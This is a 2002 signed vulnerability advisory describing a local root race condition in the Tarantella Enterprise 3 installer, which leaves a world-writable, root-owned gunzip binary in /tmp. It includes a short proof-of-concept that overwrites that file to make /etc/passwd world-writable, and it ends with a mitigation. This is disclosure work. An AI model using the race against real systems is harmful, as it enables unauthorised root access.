Vulnerability report for Tarantella Enterprise 3.

["Larry W. Cashdollar" <lwc () vapid dhs org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                                Vapid Labs
                             Larry W. Cashdollar
                                1/14/2002

Vulnerability report for Tarantella Enterprise 3.

1. local root compromise during installation:

        The installation script provided with tarentella handles utility
packages during installation insecurely.   A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.


TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
- -rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:
                    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
                    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:
            chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
            extract $efilename | $TMP_GUNZIP -q > "$efilename"

2. Exploit:

There is a race condition between when gunzip is extracted and used during
installation.  At which time a malicious local user could inject code to
compromise the system quickly.

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unpriviledged user.

3. Recommendations:

Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?

umask 077
mkdir /tmp/workdir

4. Software: Tarantella Enterprise 3

http://www.tarantella.com/download/e3/

Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----